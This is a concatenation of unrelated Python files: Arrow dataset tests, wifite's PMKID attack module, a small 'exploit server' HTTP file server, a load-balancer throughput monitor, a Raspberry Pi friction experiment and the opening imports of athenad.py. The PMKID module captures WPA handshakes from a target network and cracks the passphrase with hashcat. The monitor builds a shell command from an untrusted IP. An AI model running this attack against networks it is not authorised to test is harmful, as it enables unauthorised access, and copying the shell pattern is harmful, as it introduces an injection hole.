truth_data.output_shapes,
)
with self.assertRaisesRegex(tf.errors.OpError, "Arrow type mismatch"):
self.run_test_case(dataset, truth_data)
def test_map_and_batch(self):
"""Test that using map then batch produces correct output. This will create
a map_and_batch_dataset_op that calls GetNext after end_of_sequence=true
"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(
[list(range(10))], (tf.dtypes.int32,), (tf.TensorShape([]),)
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
batch, truth_data.output_types, truth_data.output_shapes
)
dataset = dataset.map(lambda x: x).batch(4)
expected = truth_data.data[0]
for result_tensors in dataset:
results = result_tensors.numpy()
for x in results:
self.assertTrue(expected, "Dataset has more output than expected")
self.assertEqual(x, expected[0])
expected.pop(0)
@pytest.mark.skip(reason="TODO")
def test_tf_function(self):
"""Test that an ArrowDataset can be used in tf.function call"""
import tensorflow_io.arrow as arrow_io
if not tf.version.VERSION.startswith("2."):
self.skipTest("Test requires TF2.0 for tf.function")
truth_data = TruthData(
[list(range(10)), [x * 1.1 for x in range(10)]],
(tf.dtypes.int32, tf.dtypes.float64),
(tf.TensorShape([]), tf.TensorShape([])),
)
@tf.function
def create_arrow_dataset(serialized_batch):
"""Create an arrow dataset from input tensor"""
dataset = arrow_io.ArrowDataset(
serialized_batch,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes,
)
return dataset
batch = self.make_record_batch(truth_data)
buf = io.BytesIO()
writer = pa.RecordBatchFileWriter(buf, batch.schema)
writer.write_batch(batch)
writer.close()
for row, results in enumerate(create_arrow_dataset(buf.getvalue())):
value = [result.numpy() for result in results]
self.assertEqual(value[0], truth_data.data[0][row])
self.assertAlmostEqual(value[1], truth_data.data[1][row], 4)
def test_batch_no_remainder(self):
"""Test batch_size that does not leave a remainder"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.scalar_data[0])
num_batches = 2
truth_data = TruthData(
[d * num_batches for d in self.scalar_data],
self.scalar_dtypes,
self.scalar_shapes,
)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=False, batch_size=batch_size
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_remainder(self):
"""Test batch_size that does leave a remainder"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.scalar_data[0]) - 1
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=False, batch_size=batch_size
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_drop_remainder(self):
"""Test batch_size that drops remainder data"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.scalar_data[0]) - 1
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
truth_data_drop_last = TruthData(
[d[:-1] for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=False, batch_size=batch_size, batch_mode="drop_remainder"
)
self.run_test_case(dataset, truth_data_drop_last, batch_size=batch_size)
def test_batch_mode_auto(self):
"""Test auto batch_mode to size to record batch number of rows"""
import tensorflow_io.arrow as arrow_io
num_batches = 2
single_batch_data = TruthData(
self.scalar_data, self.scalar_dtypes, self.scalar_shapes
)
batch = self.make_record_batch(single_batch_data)
batches = [batch] * num_batches
truth_data = TruthData(
[d * num_batches for d in single_batch_data.data],
single_batch_data.output_types,
single_batch_data.output_shapes,
)
dataset = arrow_io.ArrowDataset.from_record_batches(
batches,
truth_data.output_types,
truth_data.output_shapes,
batch_mode="auto",
)
self.run_test_case(dataset, truth_data, batch_size=batch.num_rows)
def test_batch_with_partials(self):
"""Test batch_size that divides an Arrow record batch into
partial batches
"""
import tensorflow_io.arrow as arrow_io
num_batches = 3
batch_size = int(len(self.scalar_data[0]) * 1.5)
single_batch_data = TruthData(
self.scalar_data, self.scalar_dtypes, self.scalar_shapes
)
batch = self.make_record_batch(single_batch_data)
batches = [batch] * num_batches
truth_data = TruthData(
[d * num_batches for d in single_batch_data.data],
single_batch_data.output_types,
single_batch_data.output_shapes,
)
# Batches should divide input without remainder
self.assertEqual(len(truth_data.data[0]) % batch_size, 0)
dataset = arrow_io.ArrowDataset.from_record_batches(
batches,
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_with_partials_and_remainder(self):
"""Test batch_size that divides an Arrow record batch into
partial batches and leaves remainder data
"""
import tensorflow_io.arrow as arrow_io
num_batches = 3
batch_size = len(self.scalar_data[0]) + 1
single_batch_data = TruthData(
self.scalar_data, self.scalar_dtypes, self.scalar_shapes
)
batch = self.make_record_batch(single_batch_data)
batches = [batch] * num_batches
truth_data = TruthData(
[d * num_batches for d in single_batch_data.data],
single_batch_data.output_types,
single_batch_data.output_shapes,
)
# Batches should divide input and leave a remainder
self.assertNotEqual(len(truth_data.data[0]) % batch_size, 0)
dataset = arrow_io.ArrowDataset.from_record_batches(
batches,
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
    def test_batch_spans_multiple_partials(self):
        """Test large batch_size that spans multiple Arrow record batches"""
import tensorflow_io.arrow as arrow_io
num_batches = 6
batch_size = int(len(self.scalar_data[0]) * 3)
single_batch_data = TruthData(
self.scalar_data, self.scalar_dtypes, self.scalar_shapes
)
batch = self.make_record_batch(single_batch_data)
batches = [batch] * num_batches
truth_data = TruthData(
[d * num_batches for d in single_batch_data.data],
single_batch_data.output_types,
single_batch_data.output_shapes,
)
dataset = arrow_io.ArrowDataset.from_record_batches(
batches,
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_fixed_lists(self):
"""Test batching with fixed length list types"""
import tensorflow_io.arrow as arrow_io
batch_size = int(len(self.list_fixed_data[0]) / 2)
truth_data = TruthData(
self.list_fixed_data, self.list_fixed_dtypes, self.list_fixed_shapes
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
[batch],
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_variable_length_list_batched(self):
"""Test batching with variable length lists raises error"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.list_var_data[1])
truth_data = TruthData(
self.list_var_data, self.list_var_dtypes, self.list_var_shapes
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
[batch],
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
with self.assertRaisesRegex(tf.errors.OpError, "variable.*unsupported"):
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_variable_length_list_unbatched(self):
"""Test unbatched variable length lists"""
import tensorflow_io.arrow as arrow_io
batch_size = None
truth_data = TruthData(
self.list_var_data, self.list_var_dtypes, self.list_var_shapes
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
[batch],
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_unsupported_batch_mode(self):
"""Test using an unsupported batch mode"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
with self.assertRaisesRegex(ValueError, "Unsupported batch_mode.*doh"):
arrow_io.ArrowDataset.from_record_batches(
[self.make_record_batch(truth_data)],
truth_data.output_types,
truth_data.output_shapes,
batch_mode="doh",
)
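        # Illustrative note: the batch_mode values exercised in this suite are
        # "drop_remainder" (test_batch_drop_remainder) and "auto" (test_batch_mode_auto);
        # an unrecognized value such as "doh" raises ValueError, as asserted above.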
def test_arrow_list_feather_columns(self):
"""test_arrow_list_feather_columns"""
import tensorflow_io.arrow as arrow_io
from pyarrow.feather import write_feather
# Feather files currently do not support columns of list types
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
# Create a tempfile that is deleted after tests run
with tempfile.NamedTemporaryFile(delete=False) as f:
write_feather(df, f, version=1)
# test single file
# prefix "file://" to test scheme file system (e.g., s3, gcs, azfs, ignite)
columns = arrow_io.list_feather_columns("file://" + f.name)
for name, dtype in list(zip(batch.schema.names, batch.schema.types)):
assert columns[name].name == name
assert columns[name].dtype == dtype
assert columns[name].shape == [4]
# test memory
with open(f.name, "rb") as ff:
memory = ff.read()
# when memory is provided filename doesn't matter:
columns = arrow_io.list_feather_columns("file:///non_exist", memory=memory)
for name, dtype in list(zip(batch.schema.names, batch.schema.types)):
assert columns[name].name == name
assert columns[name].dtype == dtype
assert columns[name].shape == [4]
os.unlink(f.name)
if __name__ == "__main__":
test.main()
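# Illustrative sketch (not part of the original test suite): the minimal
# from_pandas flow that the batching tests above exercise. Assumes pandas,
# tensorflow and tensorflow_io are installed; `df` is any DataFrame with
# scalar columns.
def _example_arrow_from_pandas(df):
    import tensorflow_io.arrow as arrow_io
    # Build a dataset directly from the DataFrame, batching two rows at a time
    dataset = arrow_io.ArrowDataset.from_pandas(df, preserve_index=False, batch_size=2)
    # In eager mode the dataset is directly iterable
    return [tensors for tensors in dataset]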
|
pmkid.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from ..model.attack import Attack
from ..config import Configuration
from ..tools.hashcat import HcxDumpTool, HcxPcapTool, Hashcat
from ..util.color import Color
from ..util.timer import Timer
from ..model.pmkid_result import CrackResultPMKID
from threading import Thread
import os
import time
import re
class AttackPMKID(Attack):
def __init__(self, target):
super(AttackPMKID, self).__init__(target)
self.crack_result = None
self.success = False
self.pcapng_file = Configuration.temp('pmkid.pcapng')
def get_existing_pmkid_file(self, bssid):
'''
Load PMKID Hash from a previously-captured hash in ./hs/
Returns:
The hashcat hash (hash*bssid*station*essid) if found.
None if not found.
'''
if not os.path.exists(Configuration.wpa_handshake_dir):
return None
bssid = bssid.lower().replace(':', '')
        file_re = re.compile(r'.*pmkid_.*\.16800')
for filename in os.listdir(Configuration.wpa_handshake_dir):
pmkid_filename = os.path.join(Configuration.wpa_handshake_dir, filename)
if not os.path.isfile(pmkid_filename):
continue
if not re.match(file_re, pmkid_filename):
continue
with open(pmkid_filename, 'r') as pmkid_handle:
pmkid_hash = pmkid_handle.read().strip()
if pmkid_hash.count('*') < 3:
continue
existing_bssid = pmkid_hash.split('*')[1].lower().replace(':', '')
if existing_bssid == bssid:
return pmkid_filename
return None
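    # Illustrative note: a hashcat 16800 line has the form
    #   <pmkid>*<bssid>*<station>*<essid>
    # which is why the BSSID is recovered with pmkid_hash.split('*')[1] above.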
def run(self):
'''
Performs PMKID attack, if possible.
1) Captures PMKID hash (or re-uses existing hash if found).
2) Cracks the hash.
Returns:
True if handshake is captured. False otherwise.
'''
from ..util.process import Process
# Check that we have all hashcat programs
dependencies = [
Hashcat.dependency_name,
HcxDumpTool.dependency_name,
HcxPcapTool.dependency_name
]
missing_deps = [dep for dep in dependencies if not Process.exists(dep)]
if len(missing_deps) > 0:
Color.pl('{!} Skipping PMKID attack, missing required tools: {O}%s{W}' % ', '.join(missing_deps))
return False
pmkid_file = None
        if not Configuration.ignore_old_handshakes:
            # Load existing PMKID hash from the filesystem
pmkid_file = self.get_existing_pmkid_file(self.target.bssid)
if pmkid_file is not None:
Color.pattack('PMKID', self.target, 'CAPTURE',
'Loaded {C}existing{W} PMKID hash: {C}%s{W}\n' % pmkid_file)
if pmkid_file is None:
# Capture hash from live target.
pmkid_file = self.capture_pmkid()
if pmkid_file is None:
return False # No hash found.
# Crack it.
try:
self.success = self.crack_pmkid_file(pmkid_file)
except KeyboardInterrupt:
Color.pl('\n{!} {R}Failed to crack PMKID: {O}Cracking interrupted by user{W}')
self.success = False
return False
return True # Even if we don't crack it, capturing a PMKID is 'successful'
def capture_pmkid(self):
'''
        Captures a PMKID from the target: runs hcxdumptool in the background and
        repeatedly extracts the hash from the .pcapng capture using hcxpcaptool.
        Returns:
            Path (str) to the saved PMKID hash file if captured, otherwise None.
'''
self.keep_capturing = True
self.timer = Timer(Configuration.pmkid_timeout)
# Start hcxdumptool
t = Thread(target=self.dumptool_thread)
t.start()
        # Repeatedly run hcxpcaptool & check its output for a hash for self.target.essid
pmkid_hash = None
pcaptool = HcxPcapTool(self.target)
while self.timer.remaining() > 0:
pmkid_hash = pcaptool.get_pmkid_hash(self.pcapng_file)
if pmkid_hash is not None:
break # Got PMKID
Color.pattack('PMKID', self.target, 'CAPTURE',
'Waiting for PMKID ({C}%s{W})' % str(self.timer))
time.sleep(1)
self.keep_capturing = False
if pmkid_hash is None:
Color.pattack('PMKID', self.target, 'CAPTURE',
'{R}Failed{O} to capture PMKID\n')
Color.pl('')
return None # No hash found.
Color.clear_entire_line()
Color.pattack('PMKID', self.target, 'CAPTURE', '{G}Captured PMKID{W}')
pmkid_file = self.save_pmkid(pmkid_hash)
return pmkid_file
def crack_pmkid_file(self, pmkid_file):
'''
        Runs hashcat against the given file containing the PMKID hash (*.16800).
If cracked, saves results in self.crack_result
Returns:
True if cracked, False otherwise.
'''
# Check that wordlist exists before cracking.
if Configuration.wordlist is None:
Color.pl('\n{!} {O}Not cracking PMKID ' +
'because there is no {R}wordlist{O} (re-run with {C}--dict{O})')
# TODO: Uncomment once --crack is updated to support recracking PMKIDs.
#Color.pl('{!} {O}Run Wifite with the {R}--crack{O} and {R}--dict{O} options to try again.')
key = None
else:
Color.clear_entire_line()
Color.pattack('PMKID', self.target, 'CRACK', 'Cracking PMKID using {C}%s{W} ...\n' % Configuration.wordlist)
key = Hashcat.crack_pmkid(pmkid_file)
if key is None:
# Failed to crack.
if Configuration.wordlist is not None:
Color.clear_entire_line()
Color.pattack('PMKID', self.target, '{R}CRACK',
'{R}Failed {O}Passphrase not found in dictionary.\n')
return False
else:
# Successfully cracked.
Color.clear_entire_line()
Color.pattack('PMKID', self.target, 'CRACKED', '{C}Key: {G}%s{W}' % key)
self.crack_result = CrackResultPMKID(self.target.bssid, self.target.essid,
pmkid_file, key)
Color.pl('\n')
self.crack_result.dump()
return True
def dumptool_thread(self):
'''Runs hashcat's hcxdumptool until it dies or `keep_capturing == False`'''
dumptool = HcxDumpTool(self.target, self.pcapng_file)
# Let the dump tool run until we have the hash.
while self.keep_capturing and dumptool.poll() is None:
time.sleep(0.5)
dumptool.interrupt()
def save_pmkid(self, pmkid_hash):
'''Saves a copy of the pmkid (handshake) to hs/ directory.'''
# Create handshake dir
if not os.path.exists(Configuration.wpa_handshake_dir):
os.makedirs(Configuration.wpa_handshake_dir)
# Generate filesystem-safe filename from bssid, essid and date
essid_safe = re.sub('[^a-zA-Z0-9]', '', self.target.essid)
bssid_safe = self.target.bssid.replace(':', '-')
date = time.strftime('%Y-%m-%dT%H-%M-%S')
pmkid_file = 'pmkid_%s_%s_%s.16800' % (essid_safe, bssid_safe, date)
pmkid_file = os.path.join(Configuration.wpa_handshake_dir, pmkid_file)
Color.p('\n{+} Saving copy of {C}PMKID Hash{W} to {C}%s{W} ' % pmkid_file)
with open(pmkid_file, 'w') as pmkid_handle:
pmkid_handle.write(pmkid_hash)
pmkid_handle.write('\n')
return pmkid_file
|
server.py
|
import os
import threading
import socket
from http.server import BaseHTTPRequestHandler, HTTPServer
class ExploitHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # favicon isn't served; answer 404 instead of an incomplete 200 response
        if self.path == '/favicon.ico':
            self.send_response(404)
            self.end_headers()
            return
        mimeType = 'text/html'
        if self.path == '/':
            self.path = '/index.html'
        if '.mp4' in self.path:
            mimeType = 'video/mp4'
        self.send_response(200)
        self.send_header('Content-type', mimeType)
        self.end_headers()
        file_path = os.path.join(os.getcwd(), 'site', self.path[1:])
        with open(file_path, 'rb') as html_data:
            self.wfile.write(html_data.read())
        return
class ExploitServer():
def __init__(self):
self.listen_port = 8000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
self.machine_ip = s.getsockname()[0]
s.close()
self.server_address = ('0.0.0.0', self.listen_port)
def start(self):
print("Exploit server listening at {}".format(self.get_listen_url()))
self.server = HTTPServer(self.server_address, ExploitHandler)
self.listenThread = threading.Thread(target=self.server.serve_forever)
self.listenThread.daemon = True
self.listenThread.start()
def stop(self):
print("Stopping exploit server")
self.server.shutdown()
self.server.socket.close()
def get_listen_url(self):
return "http://{}:{}".format(self.machine_ip, self.listen_port)
def handle_message(self, message):
getattr(self, message)()
def background(self):
nothing = True
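# Illustrative usage sketch (not part of the original module): start the server,
# keep it serving the ./site/ directory for a while, then shut it down.
if __name__ == '__main__':
    import time
    exploit_server = ExploitServer()
    exploit_server.start()
    try:
        time.sleep(60)  # serve for one minute
    finally:
        exploit_server.stop()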
|
monitor.py
|
import subprocess
import threading
import time
import json
import requests
import sys
controller_ip_port = 'localhost:8080'
def getThroughput(pool_id, id, ip):
    p = subprocess.Popen('iperf3 -c ' + ip + ' -p 500 -w 500K -J --connect-timeout 10000', stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
stdout, stderr = p.communicate()
if(stderr):
print(stderr.decode('utf-8'))
else:
output = json.loads(stdout)
if(len(output['end']) == 0):
# print(pool_id, ip, 'OFF')
obj = {"id": id, "pool_id": pool_id, "throughput": '-1'}
r = requests.put('http://'+controller_ip_port+'/quantum/v1.0/members/'+id+'/', json = obj)
else:
for i in output['end']['streams']:
obj = {"id": id, "pool_id": pool_id, "throughput": i['sender']['bits_per_second']}
r = requests.put('http://'+controller_ip_port+'/quantum/v1.0/members/'+id+'/', json = obj)
# print('http://'+controller_ip_port+'/quantum/v1.0/members/'+id+'/', obj)
return
def handlePool(pool_id):
threads = list()
r = requests.get('http://' + controller_ip_port + '/quantum/v1.0/pools/' + pool_id + '/members/')
members = json.loads(r.text)
for member in members:
id = member['id']
ip = member['address']
x = threading.Thread(target=getThroughput, args=(pool_id, id, ip, ))
threads.append(x)
x.start()
for thread in threads:
thread.join()
return
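def report_throughput(pool_id, member_id, bits_per_second):
    # Minimal sketch (illustrative only) of the controller update performed inside
    # getThroughput() above; assumes the same REST endpoint layout on the controller.
    obj = {"id": member_id, "pool_id": pool_id, "throughput": bits_per_second}
    return requests.put('http://' + controller_ip_port + '/quantum/v1.0/members/' + member_id + '/', json=obj)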
if __name__ == "__main__":
threadsP = list()
while True:
threadsP.clear()
r = requests.get('http://' + controller_ip_port + '/quantum/v1.0/pools/')
pools = json.loads(r.text)
for pool in pools:
pool_id = pool['id']
if(pool['lbMethod'] == 'LTP'):
x = threading.Thread(target=handlePool, args=(pool_id, ))
threadsP.append(x)
x.start()
for thread in threadsP:
thread.join()
print('Tests done, waiting...\n')
time.sleep(5)
|
main.py
|
from threading import Thread
from imutils.video import VideoStream
import cv2
import time
import imutils
import math
import argparse
import matplotlib.pyplot as plt
import numpy as np
parser = argparse.ArgumentParser(
description='This program calculates either the static or kinetic friction coefficient between two surfaces.')
parser.add_argument('mode', type=str, default=None,
                    help='Choose mode. The mode can be either "static" or "kinetic"')
args = parser.parse_args()
mode = args.mode
class Vision(Thread):
def __init__(self, system):
super().__init__()
self.camera = VideoStream(usePiCamera=True, resolution=(688, 528)).start()
time.sleep(0.5)
self.tracker = cv2.TrackerMOSSE_create()
self.isTracking = None
self.initBB = None
self.frame = None
self.initial_target_object_center = None
self.initial_time = time.time()
self.moving = False
self.motion_detected = False
self.speed = 0
self.system = system
self.is_running = True
self.framesToShow = dict()
self.isWindowShowEnabled = False
self.key = "empty"
self.coefficient_of_static_friction = 0.0
self.coefficient_of_kinetic_friction = 0.0
def run(self):
while self.is_running:
frame = self.camera.read()
# Object tracking
if self.isTracking:
(success, box) = self.tracker.update(frame)
if success:
(x, y, w, h) = [int(v) for v in box]
frame = cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
final_target_object_center = (x + w / 2, y + h / 2)
self.speed = self.get_speed(final_target_object_center)
if self.speed > frame.shape[0] * frame.shape[1] / 100000:
self.motion_detected = True
self.system.start_recording()
self.moving = True
else:
self.moving = False
# Arrange the screen
frame = self.arrange_screen(frame)
self.showFrame(frame)
self.isWindowShowEnabled = False
plt.close()
# Arrange the general screen
def arrange_screen(self, frame):
# General Screen
frame = cv2.rectangle(frame, (0, 490), (688, 528), (0, 0, 0), -1)
frame = cv2.rectangle(frame, (510, 0), (688, 30), (0, 0, 0), -1)
frame = cv2.putText(frame, "Angle:" + str(round(self.system.pot_angle, 1)), (10, 517), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 200), 2, cv2.LINE_AA)
frame = cv2.putText(frame, "Distance:" + str(round(self.system.sonar, 2)), (520, 20), cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 0, 200), 2, cv2.LINE_AA)
# Custom Screen Settings
if mode == "static":
frame = self.arrange_screen_static(frame)
elif mode == "kinetic":
frame = self.arrange_screen_kinetic(frame)
else:
raise Exception("Wrong mode selected. Please Specify the mode as either 'static' or 'kinetic'")
return frame
# Specialize arrange_screen for static friction calculations
def arrange_screen_static(self, frame):
if self.moving:
frame = cv2.putText(frame, "Moved!", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 200), 2, cv2.LINE_AA)
self.coefficient_of_static_friction = round(math.tan(math.pi * self.system.pot_angle / 180.0), 2)
if self.motion_detected:
frame = cv2.putText(frame, "coefficient of static friction:" + str(self.coefficient_of_static_friction),
(300, 517), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 200), 1, cv2.LINE_AA)
return frame
# Specialize arrange_screen for kinetic friction calculations
def arrange_screen_kinetic(self, frame):
if self.motion_detected:
frame = cv2.putText(frame, "Started Measuring!", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 200), 2,
cv2.LINE_AA)
frame = cv2.putText(frame, "Press the button to stop measuring", (50, 100), cv2.FONT_HERSHEY_SIMPLEX, 1.0,
(0, 0, 200), 2, cv2.LINE_AA)
if self.moving:
self.system.set_motor_speed(0)
# End reading data
if self.system.button_state and len(self.system.recorded_data) > 10:
# Stop mechanism
self.system.set_motor_speed(0)
self.motion_detected = False
# Process the recorded data
data = self.system.end_recording_data()
x = list()
y = list()
for i in data:
x.append(i["time_stamp"])
y.append(i["distance"] / 100.0)
p = plotter()
position_v_time = [x, y]
position_v_time = p.trim_data(position_v_time)
p.plot("Position", position_v_time)
position_v_time_eq = p.plot_equation("Position", position_v_time)
velocity_v_time_eq = p.take_derivative(position_v_time_eq)
acceleration_v_time_eq = p.take_derivative(velocity_v_time_eq)
_ = p.plot_equation("Velocity", position_v_time, eq=velocity_v_time_eq)
_ = p.plot_equation("Acceleration", position_v_time, eq=acceleration_v_time_eq)
print("\n\n*********************")
print("Position vs. Time Graph's Equation is:")
print(position_v_time_eq)
print("\n*********************")
print("Velocity vs. Time Graph's Equation is:", velocity_v_time_eq)
print("*********************")
print("Acceleration vs. Time Graph's Equation is:", acceleration_v_time_eq, "\n", "*********************")
            coefficient_of_kinetic_friction = round(math.tan(math.pi * self.system.pot_angle / 180.0), 2) - float(acceleration_v_time_eq.c[0]) / (9.81 * round(math.cos(math.pi * self.system.pot_angle / 180.0), 2))
            print("Therefore the coefficient of kinetic friction is:{}".format(coefficient_of_kinetic_friction))
p.show()
return frame
# Multi-threaded window showing function
def showFrame(self, frameToShow, windowName="Frame"):
self.framesToShow[windowName] = frameToShow
if not self.isWindowShowEnabled:
self.isWindowShowEnabled = True
Thread(target=self.__updateWindowFrame__, args=()).start()
# Thread for updating the frame
def __updateWindowFrame__(self):
while self.isWindowShowEnabled:
for name in self.framesToShow.copy():
cv2.imshow(name, self.framesToShow[name])
self.key = cv2.waitKey(30)
if self.key == ord("s"):
initBB = cv2.selectROI("Frame", self.framesToShow["Frame"], fromCenter=False, showCrosshair=True)
self.tracker.init(self.framesToShow["Frame"], initBB)
self.isTracking = True
if self.key == ord('r'):
self.motion_detected = False
self.tracker = cv2.TrackerMOSSE_create()
self.isTracking = False
self.system.enabled_recording = False
self.system.recorded_data = list()
cv2.destroyAllWindows()
# Calculate the velocity(pixel/seconds) of the selected object
def get_speed(self, target_center):
elapsed = time.time() - self.initial_time
if self.initial_target_object_center is None:
self.initial_target_object_center = target_center
speed = 0
else:
displacement = ((target_center[0] - self.initial_target_object_center[0]) ** 2 +
(target_center[1] - self.initial_target_object_center[1]) ** 2) ** 0.5
speed = displacement / elapsed
self.initial_time = time.time()
self.initial_target_object_center = target_center
return speed
class plotter:
def __init__(self):
self.fig, (ax1, ax2, ax3) = plt.subplots(3, 1, figsize=(7, 8))
plt.subplots_adjust(top=0.95, bottom=0.05)
ax1.set_title("Position v. Time")
ax1.set_xlabel("Time(s)")
ax1.set_xlim(left=0.0)
ax1.set_ylabel("Position(m)")
ax1.set_ylim(bottom=0.0)
ax1.grid(True)
ax1.autoscale(True)
ax2.set_title("Velocity v. Time")
ax2.set_xlabel("Time(s)")
ax2.set_xlim(left=0.0)
ax2.set_ylabel("Velocity(m/s)")
ax2.set_ylim(bottom=0.0)
ax2.grid(True)
ax2.autoscale(True)
ax3.set_title("Acceleration v. Time")
ax3.set_xlabel("Time(s)")
ax3.set_xlim(left=0.0)
ax3.set_ylabel("Acceleration(m/s^2)")
ax3.set_ylim(bottom=0.0)
ax3.grid(True)
ax3.autoscale(True)
self.ax = {
"Position": ax1,
"Velocity": ax2,
"Acceleration": ax3
}
def take_derivative(self, eq):
# second degree polynomial
if len(eq.c) == 3:
new_eq = eq.deriv()
elif len(eq.c) == 2:
new_eq = eq.deriv()
else:
raise Exception("Your equation must be either of 1st or 2nd degree")
return new_eq
def trim_data(self, data):
x = data[0]
y = data[1]
new_x = list()
new_y = list()
for t in range(0, len(y)):
x[t] = x[t] - (x[0] + x[1] + x[2] + x[3] + x[4] + x[5] + x[6] + x[7] + x[8] + x[9])/10.0
y[t] = y[t] - (y[0] + y[1] + y[2] + y[3] + y[4] + y[5] + y[6] + y[7] + y[8] + y[9])/10.0
for t, pos in enumerate(y):
if pos < 0.35 and pos > 0.03:
new_x.append(x[t])
new_y.append(pos)
return [new_x, new_y]
def plot(self, graph_of, plot_data):
self.ax[graph_of].plot(plot_data[0], plot_data[1], **{"marker": "o"})
def plot_equation(self, graph_of, data_lists, eq=None):
x = data_lists[0]
y = data_lists[1]
        t = np.linspace(0, x[-1] + 0.1, int(y[-1] + 10))  # np.linspace needs an integer sample count
if graph_of == "Position":
p_pos = np.poly1d(np.polyfit(x, y, 2))
elif graph_of == "Velocity" or graph_of == "Acceleration":
p_pos = eq
else:
raise Exception("You can only plot Position, Velocity or Acceleration")
self.ax[graph_of].plot(x, y, 'o', t, p_pos(t), '-')
return p_pos
def show(self):
plt.show()
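def kinetic_friction_coefficient(angle_deg, acceleration):
    # Illustrative helper (not used by the code above): for a block sliding down
    # an incline, m*a = m*g*sin(theta) - mu_k*m*g*cos(theta), so
    # mu_k = tan(theta) - a / (g * cos(theta)), which is the formula applied in
    # arrange_screen_kinetic(). Angle in degrees, acceleration in m/s^2, g = 9.81.
    theta = math.pi * angle_deg / 180.0
    return math.tan(theta) - acceleration / (9.81 * math.cos(theta))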
from RpiMotorLib import rpi_dc_lib
from RPi import GPIO
class InclinedSurface(Thread):
def __init__(self):
super().__init__()
self.motor = rpi_dc_lib.L298NMDc(19, 13, 26, 50)
self.pot_angle = 0.0
self.sonar = 0
self.button_state = False
self.is_running = True
self.recorded_data = list()
self.enabled_recording = False
self.percent = 0
def run(self):
import serial # Import Serial Library
arduinoSerialData = serial.Serial('/dev/ttyS0', 57600) # Create Serial port object called arduinoSerialData
while self.is_running:
try:
my_data = arduinoSerialData.readline()
str_my_data = str(my_data, encoding="utf-8").split("\r\n")[0]
list_my_data = str_my_data.split(",")
pot = int(list_my_data[0])
self.pot_angle = -0.257 * pot + 219.0
sonar = float(list_my_data[1])
self.sonar = sonar if sonar < 40 else self.sonar
self.button_state = int(list_my_data[2])
if self.enabled_recording:
measurement = {"angle": self.pot_angle,
"distance": self.sonar,
"time_stamp": time.time()}
self.recorded_data.append(measurement)
if self.percent > 0:
self.motor.backward(self.percent)
elif self.percent < 0:
self.motor.forward(-self.percent)
else:
self.motor.stop(0)
if not (-7 < self.pot_angle < 60):
self.percent = 0
except:
pass
def start_recording(self):
self.enabled_recording = True
def end_recording_data(self):
self.enabled_recording = False
initial_time = self.recorded_data[0]["time_stamp"]
for index in range(len(self.recorded_data)):
self.recorded_data[index]["time_stamp"] = self.recorded_data[index]["time_stamp"] - initial_time
return self.recorded_data
def set_motor_speed(self, percent):
self.percent = percent
def get_to_starting_point(self):
if self.pot_angle > 0:
while self.pot_angle > 0:
self.set_motor_speed(-50)
time.sleep(0.01)
else:
while self.pot_angle < 0:
self.set_motor_speed(50)
time.sleep(0.01)
self.set_motor_speed(0)
print("\n************\n")
print("The Mechanism has been set to its default position. Ready to set motor speed")
print("\n************\n")
system = InclinedSurface()
system.start()
vis = Vision(system)
vis.start()
system.get_to_starting_point()
while True:
try:
val = input("Set Motor:")
try:
if val == "default":
system.get_to_starting_point()
else:
system.set_motor_speed(int(val))
except:
print("\nOnly decimal numbers allowed!\n")
except KeyboardInterrupt:
print("\nexiting\n")
system.is_running = False
vis.is_running = False
system.set_motor_speed(0)
time.sleep(0.5)
exit()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
